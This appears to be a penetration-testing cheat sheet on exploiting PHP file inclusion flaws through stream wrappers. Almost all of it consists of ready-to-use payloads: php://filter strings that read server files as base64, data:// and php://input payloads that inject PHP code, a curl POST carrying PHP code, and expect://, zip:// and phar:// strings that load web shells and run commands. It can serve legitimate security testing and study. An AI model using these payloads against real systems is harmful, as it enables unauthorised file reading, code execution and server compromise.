PHP Wrappers File Inclusion

fileinclusion filepathtraversal php_filters remote_file_inclusion xslt_code_execution local_file_inclusion_wrappers pyrat_auction

PHP Wrappers can be used to exploit a LFI/RFI on a server as an alternative to path traversal or similar techniques.

To read a file (encoded as base64): php://filter/read=convert.base64-encode/resource=/path/to/file or use php://filter/zlib.deflate/read=convert.base64-encode/resource=/path/to/file for shorter payloads. Refer to this to automatically decode it. You may also use string.rot13 or string.rot13.

To inject some code (encoded as base64):

  • data:text/plain,<?php%20phpinfo();%20?>
  • data://text/plain;base64,<base64 php code here>
  • php://filter/convert.base64-decode/resource=data://plain/text,<base64 php code here> (is RFI the only one?)
  • allow_url_include must be enabled πŸ›‘

To inject some code (as POST data), inject php://input and use:

$ curl -s -X POST --data '<?php /* code */ ?>' [...]

We can also use some special wrappers:

  • expect://id: run the id command, not often installed
  • zip://./path/to/shell.zip%23shell.php&cmd=id: if enabled, we can load a shell inside a zip (.zip extension not mandatory).
  • phar://./path/to/shell.phar%2Fshell.php&cmd=id: if enabled, we can load a shell inside a zip (.phar extension not mandatory).

Refer to payloads to generate phar archives or to write PHP code.